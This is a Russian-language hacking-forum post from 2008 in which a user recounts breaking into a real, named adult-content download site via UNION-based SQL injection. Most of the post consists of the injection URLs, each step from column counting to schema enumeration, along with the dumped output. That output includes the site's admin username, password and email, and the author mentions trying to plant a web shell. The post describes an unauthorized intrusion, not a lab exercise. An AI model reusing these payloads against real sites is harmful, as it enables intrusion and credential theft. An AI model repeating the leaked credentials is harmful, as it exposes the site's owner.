HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 05.01.2008, 05:19
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию
предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд
поиск мне помог

нашли сайт

http://svalka.biz/go.php?go=Download&id=17985/*
http://svalka.biz/go.php?go=Download&id=17985+order+by+6/*

6 полей

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6/*

#5.0.22-log::glamur_svalka@localhost::glamur_svalka
5-тая версия - тянем всю инфу

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6+fro musers/*


http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME),3,4,5,6+from+in formation_schema.tables/*
таблици /*жалко видно таблици только этого хоста*/

glamur_svalka::admin
glamur_svalka::comments
glamur_svalka::downloads
glamur_svalka::fail_logs
glamur_svalka::iplogg
glamur_svalka::linker
glamur_svalka::main_logs
glamur_svalka::que
glamur_svalka::site_downloads
glamur_svalka::succes_logs


http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME,column_name),3,4 ,5,6+from+information_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/
glamur_svalka::succes_logs::time
glamur_svalka::succes_logs::date
glamur_svalka::succes_logs::ref
glamur_svalka::succes_logs::agent
glamur_svalka::succes_logs::hostname
glamur_svalka::succes_logs::ip
glamur_svalka::succes_logs:assword
glamur_svalka::succes_logs::username
glamur_svalka::succes_logs::id

glamur_svalka::fail_logs::time
glamur_svalka::fail_logs::date
glamur_svalka::fail_logs::ref
glamur_svalka::fail_logs::agent
glamur_svalka::fail_logs::hostname
glamur_svalka::fail_logs::ip
glamur_svalka::fail_logs:assword
glamur_svalka::fail_logs::username
glamur_svalka::fail_logs::id

glamur_svalka::admin::id
glamur_svalka::admin::username
glamur_svalka::admin:assword
glamur_svalka::admin::email
glamur_svalka::admin::level

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,id,username,password,email,level),3,4,5, 6+from+glamur_svalka.admin/*
достаем данные пользователей

1::admin::admin::webmaster@kindstot.org::1

мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,ip,username,password,ref,hostname),3,4,5 ,6+from+glamur_svalka.succes_logs/*
и мне выдало адресс админки))

http://svalka.biz/admin/admincp.php?action=login или подругому

з.ы. в админке нет ничего особо интересного =\
з.з.ы. шел не залил =\
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ